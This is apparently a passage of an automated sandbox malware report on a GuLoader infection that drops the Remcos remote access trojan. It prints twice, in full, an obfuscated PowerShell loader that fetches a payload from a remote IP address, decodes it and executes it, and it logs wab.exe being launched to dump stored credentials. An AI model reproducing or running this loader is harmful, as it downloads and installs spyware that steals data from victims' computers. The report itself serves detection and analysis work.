sSpaniol1Ddsstra2Hearts ');$Bespake=$Cirsith200[0];$Retransfigure= (fyrstendmme 'Afvundn$PrefrozgPreswall.undhedoMover.sbHyperalaUdbedrel In.fly:Rep.ginNXiphioiaSvovlagtLogfilesSma,lmikFreckpaiBeta,kef Lasca tSub endeAlarman=RechallN ,armoneRevurd,wLarrupe-Ex,itesOSynkfrdbMul,iapjBe rifteRegnskac.ackscatkarvesp IndefinSQuintupyBefi tes Flunk t Blemosefeazi gmVi.rlin. 
kalebsNselvlrteGldspostS ndpil.FelicitWYeasttiebedreafbWikenocCNongenulNoemataiGr.msereRe.ucernRatheant');$Retransfigure+=$Debater[1];Illish ($Retransfigure);Illish (fyrstendmme ' cypres$AromastNMidtpuna Sl,tdit KildetsDedicatk godskriFidsforfzees irt Prythee erg no.spraintHDeproceeBrandhra N,ughtdFelt ave.rthroprOverskus Imper,[Krigsst$ Dej soS .abrapoPrd.katrRusk rstsknsomteFlagitarPeripapifantasinFordoblgFourageeAmiglobn Thubans Sorted]Caremep=Hybridi$C llyinOSlipbanpIngel shAdrenaloPin.ettlSclaffed ScutulsDesiders Bes.fttre olubuAdvenaeeTrkkernrVegetatn.edsageeMasseresRamning ');$Tragacanthin=fyrstendmme 'Dagpeng$StemmebNSportsiaFrstevitHypnogesLadysnok edelseiUnplurafoejnenetElsassieHawkbil.ValentiD NarcotoHoveds,wMarksmanWorrieclAb,liceoSig,ejnaRecitemdMediterFSkandkki oncordl Slu bee sportd(G gossa$Asse aiB igismemisanths Roke.ip Hubbuba .usenekLaniereeU kyldf,Nglenpi$TredeltU Nonspeh Efte,sjFr.madslL.linespBoltesfeTilbag.lAkantusiPleone gUnderrusSterilitAlko,eseR.dicol)L antag ';$Uhjlpeligste=$Debater[0];Illish (fyrstendmme 'p rtesp$Whamb egWhippetlDiaspidoAntabusbAparthea Apsidcl Heli,p:OotocoiKUnratior UforskiEgernelmGymnonoiCand lanAnmodenaIm ropelDi.featiDusine sFilologtAnderumiKkkenmascymbocekExcoriaeK ralla=Smoulde(DarkerpTVichamoeCalcul,sMagnetotBehften- B.mandPBiomagnaSkrunint.ulekalh V gest Ha,ties$ce.tralUMadannohStteskij Ladyisl Ry kerpRecedeveMetapsylRadbrkkiS,ipulagLillepusdemyelitArbejdse Kom.ro)Diament ');while (!$Kriminalistiske) {Illish (fyrstendmme 'Forn.te$G sandtg IncitolAnstil oAstronab Laanena Galoppluhjlpso:O.nsgraUPlanfuldOdinitilFyraftebAustromsanko strTroug.seWhoreman InddtedRenommveSpasmag= Albain$LydinfotAnkeinsrAabninguDroemmee Carlse ') ;Illish $Tragacanthin;Illish (fyrstendmme 'UnpurifSBestykntOu.givea rundkurAspid.btBybudep-MnemoteSGarbsbel,aischaeFarfarseGadeuorpthermo, Unana y4Dativob ');Illish (fyrstendmme 'Udve.sl$Bul,endg rthantl B,arhioAntimetb ,ackveaEremuril Depres: ravestK 
RkebisrJulemrkiHalefjemNedg,aviSki.engnForsk.easubsphelSeign,oiSpectr sHasardatp,ognosiBeskedes SuspenkCompassestanisl=Sortb s(Overst,T UnsopheSigtelisBistadetWagoner-U,gangsPVa gneta SlumretTies.ethhenvejr Plkkene$Sj sstyU gtenhehBjennatjPracticlFyrfad,pAf.raadePhenazilFilinfoiUn.upergIndivids UnmythtSkraakaeNihili,)Eksport ') ;Illish (fyrstendmme 'donnaen$spytki.glymphotlRecip,ooNeptunebFashiouaExcellelApproks:Euorthos .udevoi TmmerflCiboltrv ,nbrute con,eyr BrdskrrSprinteoAt.ainedJernind=Banovin$Petitiog Skivebl LeekbuoModes gbKnhjtroaBankboglFli,esu:No,inerA ConsopsIndstnisMedansviDishingmtridermiSuggestlC,elatoeUngtelirKlientpi Dak,ylnunhelefgBemuzz.s,ammens+,critud+Dis,rra%Enbus.h$ ActinoC.kspresiVesttysr UnhabisHyldeb,iP.chydetUnlive h S nsto2Dyrekl.0 Tapets0 Ljetgo.B drvelcChloro,o AccorduDiskettn HjuledtOl ebil ') ;$Bespake=$Cirsith200[$silverrod];}$Lysimeters=302269;$Descantist115=28958;Illish (fyrstendmme 'Alfanum$ AforetgFlor.uklIndl nioF briksbophvelsaEnt rozlDomesti:AccustoTFama.ourgrydereo.hitiesmPerversmSjaler,eOrometrsilinasiaEivinkolTophscosRetsl.km Laase.aLonesoml BuffooeKaloprirManicuri chaira Datast=Obligat MellemhGlejesveehaineprtDiazino- Bi,lioCProconvoUnfoun nHomoeottBan voleBrai.wonRenkultt debora Astr.am$ Uns ufU C,bbaghEntrailjHoarseslAbra ampIndtrree afstemlPhotogriCh.ntzigIrratios Bar.artDrumloieEjendom ');Illish (fyrstendmme ' Byguer$Illustrg In,iollEmotionoSters,ybUdarm taUndergrlOveratt:BejewelSSt.llbipPosteksuBegitnimEndimeniStrningnTetran.g Upgang honekal= Remine Routous[Bi.peviSUdskamnySttterns FusiletGreenlae VestprmPei,eds.p stiesCDeputatoSidd,isnNeure.tv PatrioeB,rgravrFedderot E.eabl]Wallowi:B echan:Co,tipuFMellem,rCoursh.o P dikam GttevrBTungsinaP rsongsGrnsesfeBedownb6 B neps4PunitioS ParadotOutputfr Vandvai PlesionBilledvg Sa,cha(Ov.gene$sportelTStjfrierSystemboOldkirkmTrompetm erugineForbr rsappelsiaFatuit,lVendepusVandlovmOpkoblia NumberlExocr.nePri,ecorSjlehaliCouvade)Lnprobl ');Illish (fyrstendmme ' 
.iljkr$KubaanagKlorerelBasisbooAab.nthb M gacyaPreelecl Konc,r:AllotriJDistriboTrforaru Ch,kerrT.rarulnTetr,kiaSorterfl ,mplumnPopglovuG,ootysmForesprmUndissueOprenserExecrateBilliggtFiksere Jo dtil=Neutral Refract[SkruetrSOceanfryPejlekos irginatArchaeoef jeblam Design.AfmalenTSoodlete indkasx itziat Feoff..DokumenEUdka tnn C.nodicDe,eteroDe.enerd djustii ZonelonReperf g antime]Domsafs:Immodes:PlaceriAAmbite,SRa.hideC SkulpeIFremmedIRamrodd.Publi.eGMunkekueDahoo.stZonit dSToluidstOctileursemieggiNovelisnbl ndingAtre at( Amygda$SkovlvoSLactescpServituuAnnoncemBrugereiUncalornUnplundg Predet)Ma,dsmo ');Illish (fyrstendmme 'Beatega$AffinitgUdmaalal mningsoSquirkubHypobasaSkotjsalActualn:EsserslG GnetumesolsejlnKabine.ndizorgae StandemMonobuts ildfasiSpeci.lgOmentostFetereniYngelplgFestkl.t,ugerma=Bu,ging$ RaaklaJbov.endoBrugerku.uckerirNitterenKommu,iaSeapooslMlkevejnBoligblu U.estem ensnarmRegisteekatiposr.lvsnoreTrigamitMerchan.T bulaesBitniveu Maran bCharleys,issiontLysre urAfbarkeiSchatt.n,etrolag .iquor(Gonobla$CirculiLVe blesyFadervosLucin,ci Orifacm AnaceseUndlivetGen emseTilgr nrYv,rfics Omnipr,Sh,rrie$NaologiD La,ineeU,fladnsInelastcOpsatseaForholdnProkurat RecarbirussecosUnderkat Observ1 Massep1Betterg5S ovene)e sinfe ');Illish $Gennemsigtigt;"
                  Imagebase:0x7ff6e3d50000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:01:48:52
                  Start date:02/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff66e660000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:01:48:54
                  Start date:02/07/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"
                  Imagebase:0x7ff744e60000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:01:49:01
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. 
drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerlidKonomi. 
Arkivk/StoreslcInsu pa Futur m$MessersBBaghaano,innaclmIndeterbSkolegaeStikkess Hopkint .oktoroPatchi pUtilregp,amsinge Dispost arinasenkelhe)Dibutyr ');Illish (fyrstendmme 'Smoking$ Re,ultgPhosph.lOutswiroCyclusgbvalenceaNo,dendlM cetoz: Bru erCagonisei S.ddelrNsevrdis LavfalisemitertFor.ftehIndkoms2 Produk0Sommerf0Renteko=Uprcise$DebentuB MormoneDronninsSynkrospSnubbisa Driv ukRadioake Aquavi.RacistesBurblinpGront elFlor.neiCha.aeptUspoken(Frstega$E.ectroDMolervreMartelbuMa.ionetSandeleoinconsuxMiljstti Madpakd kudenseUdbryde) Chaper ');Illish (fyrstendmme 'Bestraa[Se tienNVentilee Inspirt Pedime.Rr,lsevS Br.steeIndbyggrCitificvS.umkvaiAr,ejdscV,nvitteRicinelPKoleriko tndstii U.opian SutrastNormeriM,ekapitaFangernnFirmamraNephrodgAnisbole sammenr C,rkel]Snea,in: Totali:Mo finiS TytheieAmac atcTektit.uG ossopr TelestiD ellintMikraesyRefri ePUerholdrPaucispoHapsendtirrepaioPalatogc T.berioMorgenpl,atarbf Ma.ning=Bernetk Entire[ PotensNLangspyeOpfindetFromber.Jugeme,SSrkendeeSmaaforc TilsaeuCorindorBroka.ei Ilde ttOver,lyyLati,skPClive,er,orlagsoScattert Misinfohav,nenc Gledesokr.nragl ,lhambTPersienybottonhpNe rusteEpigram]Grundfl:Pi fleo:FarveskTRegnskalAutomo sSpaniol1Ddsstra2Hearts ');$Bespake=$Cirsith200[0];$Retransfigure= (fyrstendmme 'Afvundn$PrefrozgPreswall.undhedoMover.sbHyperalaUdbedrel In.fly:Rep.ginNXiphioiaSvovlagtLogfilesSma,lmikFreckpaiBeta,kef Lasca tSub endeAlarman=RechallN ,armoneRevurd,wLarrupe-Ex,itesOSynkfrdbMul,iapjBe rifteRegnskac.ackscatkarvesp IndefinSQuintupyBefi tes Flunk t Blemosefeazi gmVi.rlin. 
kalebsNselvlrteGldspostS ndpil.FelicitWYeasttiebedreafbWikenocCNongenulNoemataiGr.msereRe.ucernRatheant');$Retransfigure+=$Debater[1];Illish ($Retransfigure);Illish (fyrstendmme ' cypres$AromastNMidtpuna Sl,tdit KildetsDedicatk godskriFidsforfzees irt Prythee erg no.spraintHDeproceeBrandhra N,ughtdFelt ave.rthroprOverskus Imper,[Krigsst$ Dej soS .abrapoPrd.katrRusk rstsknsomteFlagitarPeripapifantasinFordoblgFourageeAmiglobn Thubans Sorted]Caremep=Hybridi$C llyinOSlipbanpIngel shAdrenaloPin.ettlSclaffed ScutulsDesiders Bes.fttre olubuAdvenaeeTrkkernrVegetatn.edsageeMasseresRamning ');$Tragacanthin=fyrstendmme 'Dagpeng$StemmebNSportsiaFrstevitHypnogesLadysnok edelseiUnplurafoejnenetElsassieHawkbil.ValentiD NarcotoHoveds,wMarksmanWorrieclAb,liceoSig,ejnaRecitemdMediterFSkandkki oncordl Slu bee sportd(G gossa$Asse aiB igismemisanths Roke.ip Hubbuba .usenekLaniereeU kyldf,Nglenpi$TredeltU Nonspeh Efte,sjFr.madslL.linespBoltesfeTilbag.lAkantusiPleone gUnderrusSterilitAlko,eseR.dicol)L antag ';$Uhjlpeligste=$Debater[0];Illish (fyrstendmme 'p rtesp$Whamb egWhippetlDiaspidoAntabusbAparthea Apsidcl Heli,p:OotocoiKUnratior UforskiEgernelmGymnonoiCand lanAnmodenaIm ropelDi.featiDusine sFilologtAnderumiKkkenmascymbocekExcoriaeK ralla=Smoulde(DarkerpTVichamoeCalcul,sMagnetotBehften- B.mandPBiomagnaSkrunint.ulekalh V gest Ha,ties$ce.tralUMadannohStteskij Ladyisl Ry kerpRecedeveMetapsylRadbrkkiS,ipulagLillepusdemyelitArbejdse Kom.ro)Diament ');while (!$Kriminalistiske) {Illish (fyrstendmme 'Forn.te$G sandtg IncitolAnstil oAstronab Laanena Galoppluhjlpso:O.nsgraUPlanfuldOdinitilFyraftebAustromsanko strTroug.seWhoreman InddtedRenommveSpasmag= Albain$LydinfotAnkeinsrAabninguDroemmee Carlse ') ;Illish $Tragacanthin;Illish (fyrstendmme 'UnpurifSBestykntOu.givea rundkurAspid.btBybudep-MnemoteSGarbsbel,aischaeFarfarseGadeuorpthermo, Unana y4Dativob ');Illish (fyrstendmme 'Udve.sl$Bul,endg rthantl B,arhioAntimetb ,ackveaEremuril Depres: ravestK 
RkebisrJulemrkiHalefjemNedg,aviSki.engnForsk.easubsphelSeign,oiSpectr sHasardatp,ognosiBeskedes SuspenkCompassestanisl=Sortb s(Overst,T UnsopheSigtelisBistadetWagoner-U,gangsPVa gneta SlumretTies.ethhenvejr Plkkene$Sj sstyU gtenhehBjennatjPracticlFyrfad,pAf.raadePhenazilFilinfoiUn.upergIndivids UnmythtSkraakaeNihili,)Eksport ') ;Illish (fyrstendmme 'donnaen$spytki.glymphotlRecip,ooNeptunebFashiouaExcellelApproks:Euorthos .udevoi TmmerflCiboltrv ,nbrute con,eyr BrdskrrSprinteoAt.ainedJernind=Banovin$Petitiog Skivebl LeekbuoModes gbKnhjtroaBankboglFli,esu:No,inerA ConsopsIndstnisMedansviDishingmtridermiSuggestlC,elatoeUngtelirKlientpi Dak,ylnunhelefgBemuzz.s,ammens+,critud+Dis,rra%Enbus.h$ ActinoC.kspresiVesttysr UnhabisHyldeb,iP.chydetUnlive h S nsto2Dyrekl.0 Tapets0 Ljetgo.B drvelcChloro,o AccorduDiskettn HjuledtOl ebil ') ;$Bespake=$Cirsith200[$silverrod];}$Lysimeters=302269;$Descantist115=28958;Illish (fyrstendmme 'Alfanum$ AforetgFlor.uklIndl nioF briksbophvelsaEnt rozlDomesti:AccustoTFama.ourgrydereo.hitiesmPerversmSjaler,eOrometrsilinasiaEivinkolTophscosRetsl.km Laase.aLonesoml BuffooeKaloprirManicuri chaira Datast=Obligat MellemhGlejesveehaineprtDiazino- Bi,lioCProconvoUnfoun nHomoeottBan voleBrai.wonRenkultt debora Astr.am$ Uns ufU C,bbaghEntrailjHoarseslAbra ampIndtrree afstemlPhotogriCh.ntzigIrratios Bar.artDrumloieEjendom ');Illish (fyrstendmme ' Byguer$Illustrg In,iollEmotionoSters,ybUdarm taUndergrlOveratt:BejewelSSt.llbipPosteksuBegitnimEndimeniStrningnTetran.g Upgang honekal= Remine Routous[Bi.peviSUdskamnySttterns FusiletGreenlae VestprmPei,eds.p stiesCDeputatoSidd,isnNeure.tv PatrioeB,rgravrFedderot E.eabl]Wallowi:B echan:Co,tipuFMellem,rCoursh.o P dikam GttevrBTungsinaP rsongsGrnsesfeBedownb6 B neps4PunitioS ParadotOutputfr Vandvai PlesionBilledvg Sa,cha(Ov.gene$sportelTStjfrierSystemboOldkirkmTrompetm erugineForbr rsappelsiaFatuit,lVendepusVandlovmOpkoblia NumberlExocr.nePri,ecorSjlehaliCouvade)Lnprobl ');Illish (fyrstendmme ' 
.iljkr$KubaanagKlorerelBasisbooAab.nthb M gacyaPreelecl Konc,r:AllotriJDistriboTrforaru Ch,kerrT.rarulnTetr,kiaSorterfl ,mplumnPopglovuG,ootysmForesprmUndissueOprenserExecrateBilliggtFiksere Jo dtil=Neutral Refract[SkruetrSOceanfryPejlekos irginatArchaeoef jeblam Design.AfmalenTSoodlete indkasx itziat Feoff..DokumenEUdka tnn C.nodicDe,eteroDe.enerd djustii ZonelonReperf g antime]Domsafs:Immodes:PlaceriAAmbite,SRa.hideC SkulpeIFremmedIRamrodd.Publi.eGMunkekueDahoo.stZonit dSToluidstOctileursemieggiNovelisnbl ndingAtre at( Amygda$SkovlvoSLactescpServituuAnnoncemBrugereiUncalornUnplundg Predet)Ma,dsmo ');Illish (fyrstendmme 'Beatega$AffinitgUdmaalal mningsoSquirkubHypobasaSkotjsalActualn:EsserslG GnetumesolsejlnKabine.ndizorgae StandemMonobuts ildfasiSpeci.lgOmentostFetereniYngelplgFestkl.t,ugerma=Bu,ging$ RaaklaJbov.endoBrugerku.uckerirNitterenKommu,iaSeapooslMlkevejnBoligblu U.estem ensnarmRegisteekatiposr.lvsnoreTrigamitMerchan.T bulaesBitniveu Maran bCharleys,issiontLysre urAfbarkeiSchatt.n,etrolag .iquor(Gonobla$CirculiLVe blesyFadervosLucin,ci Orifacm AnaceseUndlivetGen emseTilgr nrYv,rfics Omnipr,Sh,rrie$NaologiD La,ineeU,fladnsInelastcOpsatseaForholdnProkurat RecarbirussecosUnderkat Observ1 Massep1Betterg5S ovene)e sinfe ');Illish $Gennemsigtigt;"
                  Imagebase:0xe0000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2523348220.0000000008E50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2523450659.00000000098C6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:6
                  Start time:01:49:02
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"
                  Imagebase:0x1c0000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:10
                  Start time:01:49:23
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.3365707907.0000000003B66000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:false

                  Target ID:12
                  Start time:01:49:34
                  Start date:02/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff66e660000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:14
                  Start time:01:49:41
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xmgittpzhob"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:15
                  Start time:01:49:41
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iglbtlabvwtooe"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:16
                  Start time:01:49:41
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\kiztuekujelbqlwip"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 960fc8750931430f91fa7f91c31e81fd5fbee6658843f19a6dea9742491e995a
                    • Instruction ID: d392bee2cca1b10ab38c850ac26c805d6a2f6ee876ce720c21415b3eef3b58af
                    • Opcode Fuzzy Hash: 960fc8750931430f91fa7f91c31e81fd5fbee6658843f19a6dea9742491e995a
                    • Instruction Fuzzy Hash: 3AC1BE75A002089FDB14DFA8D444AADBBF2FF85304F158969E406AF266DB34FD59CB80
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 01a72d0f60b646706821021c9f9c7301c94988d14cf70eae4dda92dc4099369b
                    • Instruction ID: 8a507e61f639064f189ed7386ed23de8534c0b3eb0627597aaf7691fc804a97e
                    • Opcode Fuzzy Hash: 01a72d0f60b646706821021c9f9c7301c94988d14cf70eae4dda92dc4099369b
                    • Instruction Fuzzy Hash: C69127F1704306DFEB148B74885476A77EAAF86200F1480EAD546CB395DB36E849CB52
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 637f9c69fa17684b1acd370e4e713838a6efbb56be36a3414215cb36b8154fd7
                    • Instruction ID: 61413a86786741e74f59e3e03b5fc583e507c7ff3410e9c8a23eb42b05e0c275
                    • Opcode Fuzzy Hash: 637f9c69fa17684b1acd370e4e713838a6efbb56be36a3414215cb36b8154fd7
                    • Instruction Fuzzy Hash: D1B17D70E00209DFDF10CFA9C8857EEBBF2AF88308F149529D815AB254EB34B855CB95
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a2b212d007e5635d0d840c6fbbc600b453570de0f88c582925ded34558063ed6
                    • Instruction ID: e93b688538e311dc2a2f9b03c6de785cf3dfac1ff4603f5d678e212e7503d355
                    • Opcode Fuzzy Hash: a2b212d007e5635d0d840c6fbbc600b453570de0f88c582925ded34558063ed6
                    • Instruction Fuzzy Hash: E2B17C70E00209CFDB10CFA9D8957DDBBF2AF88318F149529E819EB254EB74B855CB91
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 13ff40d0004e242884a069fa726f3638c5d6aa3fecb054bdf6a6a36222e00910
                    • Instruction ID: 2bd3f5b22fc730ba17a9c94948da7d3d558911efee94e15759458200fdc5b238
                    • Opcode Fuzzy Hash: 13ff40d0004e242884a069fa726f3638c5d6aa3fecb054bdf6a6a36222e00910
                    • Instruction Fuzzy Hash: 0891BE74A00605CFCB05CF59C494AAEFBB1FF88314B2586A9D655AB3A5C335FC51CBA0
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 486a5ab62659c2b108d6b44dbdc67b8dbe4058ea53dd8cdf914b4c23d62c0873
                    • Instruction ID: 83e52d7e764f39cb23619e27dd999b91e5ff18511952877edf5282dea75d620f
